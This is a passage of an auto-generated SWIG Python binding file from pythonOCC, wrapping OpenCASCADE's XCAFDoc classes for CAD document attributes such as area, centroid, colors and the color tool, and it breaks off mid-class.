XCAFDoc_ColorSurf = _XCAFDoc.XCAFDoc_ColorSurf
XCAFDoc_ColorCurv = _XCAFDoc.XCAFDoc_ColorCurv
class xcafdoc(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def AssemblyGUID(*args):
"""
* Returns GUID for UAttribute identifying assembly
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_AssemblyGUID(*args)
AssemblyGUID = staticmethod(AssemblyGUID)
def ShapeRefGUID(*args):
"""
* Returns GUID for TreeNode representing assembly link
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ShapeRefGUID(*args)
ShapeRefGUID = staticmethod(ShapeRefGUID)
def ColorRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of colors
:param type:
:type type: XCAFDoc_ColorType
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ColorRefGUID(*args)
ColorRefGUID = staticmethod(ColorRefGUID)
def DimTolRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of DGT
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DimTolRefGUID(*args)
DimTolRefGUID = staticmethod(DimTolRefGUID)
def DatumRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of datum
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DatumRefGUID(*args)
DatumRefGUID = staticmethod(DatumRefGUID)
def DatumTolRefGUID(*args):
"""
* Return GUIDs for TreeNode representing connections Datum-Toler
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DatumTolRefGUID(*args)
DatumTolRefGUID = staticmethod(DatumTolRefGUID)
def LayerRefGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_LayerRefGUID(*args)
LayerRefGUID = staticmethod(LayerRefGUID)
def MaterialRefGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_MaterialRefGUID(*args)
MaterialRefGUID = staticmethod(MaterialRefGUID)
def InvisibleGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_InvisibleGUID(*args)
InvisibleGUID = staticmethod(InvisibleGUID)
def ExternRefGUID(*args):
"""
* Returns GUID for UAttribute identifying external reference on no-step file
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ExternRefGUID(*args)
ExternRefGUID = staticmethod(ExternRefGUID)
def SHUORefGUID(*args):
"""
* Returns GUID for UAttribute identifying specified higher usage occurrence
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_SHUORefGUID(*args)
SHUORefGUID = staticmethod(SHUORefGUID)
def __init__(self):
_XCAFDoc.xcafdoc_swiginit(self,_XCAFDoc.new_xcafdoc())
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
xcafdoc._kill_pointed = new_instancemethod(_XCAFDoc.xcafdoc__kill_pointed,None,xcafdoc)
xcafdoc_swigregister = _XCAFDoc.xcafdoc_swigregister
xcafdoc_swigregister(xcafdoc)
def xcafdoc_AssemblyGUID(*args):
"""
* Returns GUID for UAttribute identifying assembly
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_AssemblyGUID(*args)
def xcafdoc_ShapeRefGUID(*args):
"""
* Returns GUID for TreeNode representing assembly link
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ShapeRefGUID(*args)
def xcafdoc_ColorRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of colors
:param type:
:type type: XCAFDoc_ColorType
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ColorRefGUID(*args)
def xcafdoc_DimTolRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of DGT
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DimTolRefGUID(*args)
def xcafdoc_DatumRefGUID(*args):
"""
* Return GUIDs for TreeNode representing specified types of datum
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DatumRefGUID(*args)
def xcafdoc_DatumTolRefGUID(*args):
"""
* Return GUIDs for TreeNode representing connections Datum-Toler
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_DatumTolRefGUID(*args)
def xcafdoc_LayerRefGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_LayerRefGUID(*args)
def xcafdoc_MaterialRefGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_MaterialRefGUID(*args)
def xcafdoc_InvisibleGUID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_InvisibleGUID(*args)
def xcafdoc_ExternRefGUID(*args):
"""
* Returns GUID for UAttribute identifying external reference on no-step file
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_ExternRefGUID(*args)
def xcafdoc_SHUORefGUID(*args):
"""
* Returns GUID for UAttribute identifying specified higher usage occurrence
:rtype: Standard_GUID
"""
return _XCAFDoc.xcafdoc_SHUORefGUID(*args)
class XCAFDoc_Area(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* class methods =============
:rtype: None
"""
_XCAFDoc.XCAFDoc_Area_swiginit(self,_XCAFDoc.new_XCAFDoc_Area(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Area_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Sets a value of volume
:param vol:
:type vol: float
:rtype: None
* Find, or create, an Area attribute and set its value
:param label:
:type label: TDF_Label &
:param area:
:type area: float
:rtype: Handle_XCAFDoc_Area
"""
return _XCAFDoc.XCAFDoc_Area_Set(*args)
Set = staticmethod(Set)
def Get(*args):
"""
:rtype: float
* Returns volume of area as argument and succes status returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param area:
:type area: float &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Area_Get(*args)
Get = staticmethod(Get)
def DumpToString(self):
"""DumpToString(XCAFDoc_Area self) -> std::string"""
return _XCAFDoc.XCAFDoc_Area_DumpToString(self)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Area self)"""
return _XCAFDoc.XCAFDoc_Area__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Area self) -> Handle_XCAFDoc_Area"""
return _XCAFDoc.XCAFDoc_Area_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Area.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Area_DumpToString,None,XCAFDoc_Area)
XCAFDoc_Area._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Area__kill_pointed,None,XCAFDoc_Area)
XCAFDoc_Area.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Area_GetHandle,None,XCAFDoc_Area)
XCAFDoc_Area_swigregister = _XCAFDoc.XCAFDoc_Area_swigregister
XCAFDoc_Area_swigregister(XCAFDoc_Area)
def XCAFDoc_Area_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Area_GetID(*args)
def XCAFDoc_Area_Set(*args):
"""
* Sets a value of volume
:param vol:
:type vol: float
:rtype: None
* Find, or create, an Area attribute and set its value
:param label:
:type label: TDF_Label &
:param area:
:type area: float
:rtype: Handle_XCAFDoc_Area
"""
return _XCAFDoc.XCAFDoc_Area_Set(*args)
def XCAFDoc_Area_Get(*args):
"""
:rtype: float
* Returns volume of area as argument and succes status returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param area:
:type area: float &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Area_Get(*args)
class Handle_XCAFDoc_Area(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Area_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Area(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Area_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Area.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_Nullify,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_IsNull,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_GetObject,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area__kill_pointed,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area_swigregister = _XCAFDoc.Handle_XCAFDoc_Area_swigregister
Handle_XCAFDoc_Area_swigregister(Handle_XCAFDoc_Area)
def Handle_XCAFDoc_Area_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Area_DownCast(*args)
Handle_XCAFDoc_Area_DownCast = _XCAFDoc.Handle_XCAFDoc_Area_DownCast
class XCAFDoc_Centroid(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* class methods =============
:rtype: None
"""
_XCAFDoc.XCAFDoc_Centroid_swiginit(self,_XCAFDoc.new_XCAFDoc_Centroid(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Centroid_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
* Find, or create, a Location attribute and set it's value the Location attribute is returned. Location methods ===============
:param label:
:type label: TDF_Label &
:param pnt:
:type pnt: gp_Pnt
:rtype: Handle_XCAFDoc_Centroid
:param pnt:
:type pnt: gp_Pnt
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Centroid_Set(self, *args)
def Get(*args):
"""
:rtype: gp_Pnt
* Returns point as argument returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param pnt:
:type pnt: gp_Pnt
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Centroid_Get(*args)
Get = staticmethod(Get)
def DumpToString(self):
"""DumpToString(XCAFDoc_Centroid self) -> std::string"""
return _XCAFDoc.XCAFDoc_Centroid_DumpToString(self)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Centroid self)"""
return _XCAFDoc.XCAFDoc_Centroid__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Centroid self) -> Handle_XCAFDoc_Centroid"""
return _XCAFDoc.XCAFDoc_Centroid_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Centroid.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_Set,None,XCAFDoc_Centroid)
XCAFDoc_Centroid.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_DumpToString,None,XCAFDoc_Centroid)
XCAFDoc_Centroid._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid__kill_pointed,None,XCAFDoc_Centroid)
XCAFDoc_Centroid.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_GetHandle,None,XCAFDoc_Centroid)
XCAFDoc_Centroid_swigregister = _XCAFDoc.XCAFDoc_Centroid_swigregister
XCAFDoc_Centroid_swigregister(XCAFDoc_Centroid)
def XCAFDoc_Centroid_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Centroid_GetID(*args)
def XCAFDoc_Centroid_Get(*args):
"""
:rtype: gp_Pnt
* Returns point as argument returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param pnt:
:type pnt: gp_Pnt
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Centroid_Get(*args)
class Handle_XCAFDoc_Centroid(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Centroid_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Centroid(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Centroid_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Centroid.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_Nullify,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_IsNull,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_GetObject,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid__kill_pointed,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid_swigregister = _XCAFDoc.Handle_XCAFDoc_Centroid_swigregister
Handle_XCAFDoc_Centroid_swigregister(Handle_XCAFDoc_Centroid)
def Handle_XCAFDoc_Centroid_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Centroid_DownCast(*args)
Handle_XCAFDoc_Centroid_DownCast = _XCAFDoc.Handle_XCAFDoc_Centroid_DownCast
class XCAFDoc_Color(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_Color_swiginit(self,_XCAFDoc.new_XCAFDoc_Color(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Color_GetID(*args)
GetID = staticmethod(GetID)
def Set(self, *args):
"""
:param label:
:type label: TDF_Label &
:param C:
:type C: Quantity_Color &
:rtype: Handle_XCAFDoc_Color
:param label:
:type label: TDF_Label &
:param C:
:type C: Quantity_NameOfColor
:rtype: Handle_XCAFDoc_Color
* Find, or create, a Color attribute and set it's value the Color attribute is returned.
:param label:
:type label: TDF_Label &
:param R:
:type R: float
:param G:
:type G: float
:param B:
:type B: float
:rtype: Handle_XCAFDoc_Color
:param C:
:type C: Quantity_Color &
:rtype: None
:param C:
:type C: Quantity_NameOfColor
:rtype: None
:param R:
:type R: float
:param G:
:type G: float
:param B:
:type B: float
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Color_Set(self, *args)
def GetColor(self, *args):
"""
:rtype: Quantity_Color
"""
return _XCAFDoc.XCAFDoc_Color_GetColor(self, *args)
def GetNOC(self, *args):
"""
:rtype: Quantity_NameOfColor
"""
return _XCAFDoc.XCAFDoc_Color_GetNOC(self, *args)
def GetRGB(self, *args):
"""
* Returns True if there is a reference on the same label
:param R:
:type R: float &
:param G:
:type G: float &
:param B:
:type B: float &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_Color_GetRGB(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Color self)"""
return _XCAFDoc.XCAFDoc_Color__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Color self) -> Handle_XCAFDoc_Color"""
return _XCAFDoc.XCAFDoc_Color_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Color.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Color_Set,None,XCAFDoc_Color)
XCAFDoc_Color.GetColor = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetColor,None,XCAFDoc_Color)
XCAFDoc_Color.GetNOC = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetNOC,None,XCAFDoc_Color)
XCAFDoc_Color.GetRGB = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetRGB,None,XCAFDoc_Color)
XCAFDoc_Color._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Color__kill_pointed,None,XCAFDoc_Color)
XCAFDoc_Color.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Color_GetHandle,None,XCAFDoc_Color)
XCAFDoc_Color_swigregister = _XCAFDoc.XCAFDoc_Color_swigregister
XCAFDoc_Color_swigregister(XCAFDoc_Color)
def XCAFDoc_Color_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Color_GetID(*args)
class Handle_XCAFDoc_Color(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Color_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Color(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Color_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Color.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_Nullify,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_IsNull,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color_GetObject,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Color__kill_pointed,None,Handle_XCAFDoc_Color)
Handle_XCAFDoc_Color_swigregister = _XCAFDoc.Handle_XCAFDoc_Color_swigregister
Handle_XCAFDoc_Color_swigregister(Handle_XCAFDoc_Color)
def Handle_XCAFDoc_Color_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Color_DownCast(*args)
Handle_XCAFDoc_Color_DownCast = _XCAFDoc.Handle_XCAFDoc_Color_DownCast
class XCAFDoc_ColorTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_ColorTool_swiginit(self,_XCAFDoc.new_XCAFDoc_ColorTool(*args))
def Set(*args):
"""
* Creates (if not exist) ColorTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ColorTool
"""
return _XCAFDoc.XCAFDoc_ColorTool_Set(*args)
Set = staticmethod(Set)
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ColorTool_GetID(*args)
GetID = staticmethod(GetID)
def BaseLabel(self, *args):
"""
* returns the label under which colors are stored
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ColorTool_BaseLabel(self, *args)
def ShapeTool(self, *args):
"""
* Returns internal XCAFDoc_ShapeTool tool
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_ColorTool_ShapeTool(self, *args)
def IsColor(self, *args):
"""
* Returns True if label belongs to a colortable and is a color definition
:param lab:
:type lab: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_IsColor(self, *args)
def FindColor(self, *args):
"""
* Finds a color definition in a colortable and returns its label if found Returns False if color is not found in colortable
:param col:
:type col: Quantity_Color &
:param lab:
:type lab: TDF_Label &
:rtype: bool
* Finds a color definition in a colortable and returns its label if found (or Null label else)
:param col:
:type col: Quantity_Color &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ColorTool_FindColor(self, *args)
def AddColor(self, *args):
"""
* Adds a color definition to a colortable and returns its label (returns existing label if the same color is already defined)
:param col:
:type col: Quantity_Color &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_ColorTool_AddColor(self, *args)
def RemoveColor(self, *args):
"""
* Removes color from the colortable
:param lab:
:type lab: TDF_Label &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ColorTool_RemoveColor(self, *args)
def GetColors(self, *args):
"""
* Returns a sequence of colors currently stored in the colortable
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ColorTool_GetColors(self, *args)
def SetColor(self, *args):
"""
* Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color defined by <colorL>. Color of shape is defined following way in dependance with type of color. If type of color is XCAFDoc_ColorGen - then this color defines default color for surfaces and curves. If for shape color with types XCAFDoc_ColorSurf or XCAFDoc_ColorCurv is specified then such color overrides generic color.
:param L:
:type L: TDF_Label &
:param colorL:
:type colorL: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:rtype: None
* Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color <Color> in the colortable Adds a color as necessary
:param L:
:type L: TDF_Label &
:param Color:
:type Color: Quantity_Color &
:param type:
:type type: XCAFDoc_ColorType
:rtype: None
* Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color defined by <colorL> Returns False if cannot find a label for shape S
:param S:
:type S: TopoDS_Shape &
:param colorL:
:type colorL: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:rtype: bool
* Sets a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color <Color> in the colortable Adds a color as necessary Returns False if cannot find a label for shape S
:param S:
:type S: TopoDS_Shape &
:param Color:
:type Color: Quantity_Color &
:param type:
:type type: XCAFDoc_ColorType
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_SetColor(self, *args)
def UnSetColor(self, *args):
"""
* Removes a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color
:param L:
:type L: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:rtype: None
* Removes a link with GUID defined by <type> (see XCAFDoc::ColorRefGUID()) from label <L> to color Returns True if such link existed
:param S:
:type S: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_UnSetColor(self, *args)
def IsSet(self, *args):
"""
* Returns True if label <L> has a color assignment of the type <type>
:param L:
:type L: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:rtype: bool
* Returns True if label <L> has a color assignment of the type <type>
:param S:
:type S: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_IsSet(self, *args)
def GetColor(self, *args):
"""
* Returns color defined by label lab Returns False if the label is not in colortable or does not define a color
:param lab:
:type lab: TDF_Label &
:param col:
:type col: Quantity_Color &
:rtype: bool
* Returns label with color assigned to <L> as <type> Returns False if no such color is assigned
:param L:
:type L: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:param colorL:
:type colorL: TDF_Label &
:rtype: bool
* Returns color assigned to <L> as <type> Returns False if no such color is assigned
:param L:
:type L: TDF_Label &
:param type:
:type type: XCAFDoc_ColorType
:param color:
:type color: Quantity_Color &
:rtype: bool
* Returns label with color assigned to <L> as <type> Returns False if no such color is assigned
:param S:
:type S: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:param colorL:
:type colorL: TDF_Label &
:rtype: bool
* Returns color assigned to <L> as <type> Returns False if no such color is assigned
:param S:
:type S: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:param color:
:type color: Quantity_Color &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_GetColor(self, *args)
def IsVisible(self, *args):
"""
* Return True if object on this label is visible, False if invisible.
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_IsVisible(self, *args)
def SetVisibility(self, *args):
"""
* Set the visibility of object on label. Do nothing if there no any object. Set UAttribute with corresponding GUID.
:param shapeLabel:
:type shapeLabel: TDF_Label &
:param isvisible: default value is Standard_True
:type isvisible: bool
:rtype: None
"""
return _XCAFDoc.XCAFDoc_ColorTool_SetVisibility(self, *args)
def SetInstanceColor(self, *args):
"""
* Sets the color of component that styled with SHUO structure Returns False if no sush component found NOTE: create SHUO structeure if it is necessary and if <isCreateSHUO>
:param theShape:
:type theShape: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:param color:
:type color: Quantity_Color &
:param isCreateSHUO: default value is Standard_True
:type isCreateSHUO: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_SetInstanceColor(self, *args)
def GetInstanceColor(self, *args):
"""
* Gets the color of component that styled with SHUO structure Returns False if no sush component or color type
:param theShape:
:type theShape: TopoDS_Shape &
:param type:
:type type: XCAFDoc_ColorType
:param color:
:type color: Quantity_Color &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_GetInstanceColor(self, *args)
def IsInstanceVisible(self, *args):
"""
* Gets the visibility status of component that styled with SHUO structure Returns False if no sush component
:param theShape:
:type theShape: TopoDS_Shape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_IsInstanceVisible(self, *args)
def ReverseChainsOfTreeNodes(self, *args):
"""
* Reverses order in chains of TreeNodes (from Last to First) under each Color Label since we became to use function ::Prepend() instead of ::Append() in method SetColor() for acceleration
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ColorTool_ReverseChainsOfTreeNodes(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_ColorTool self)"""
return _XCAFDoc.XCAFDoc_ColorTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_ColorTool self) -> Handle_XCAFDoc_ColorTool"""
return _XCAFDoc.XCAFDoc_ColorTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_ColorTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_BaseLabel,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_ShapeTool,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.FindColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_FindColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.AddColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_AddColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.RemoveColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_RemoveColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetColors = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetColors,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.UnSetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_UnSetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsSet = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsSet,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsVisible = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsVisible,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetVisibility = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetVisibility,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.SetInstanceColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_SetInstanceColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetInstanceColor = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetInstanceColor,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.IsInstanceVisible = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_IsInstanceVisible,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.ReverseChainsOfTreeNodes = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_ReverseChainsOfTreeNodes,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool__kill_pointed,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ColorTool_GetHandle,None,XCAFDoc_ColorTool)
XCAFDoc_ColorTool_swigregister = _XCAFDoc.XCAFDoc_ColorTool_swigregister
XCAFDoc_ColorTool_swigregister(XCAFDoc_ColorTool)
def XCAFDoc_ColorTool_Set(*args):
"""
* Creates (if not exist) ColorTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ColorTool
"""
return _XCAFDoc.XCAFDoc_ColorTool_Set(*args)
def XCAFDoc_ColorTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ColorTool_GetID(*args)
class Handle_XCAFDoc_ColorTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
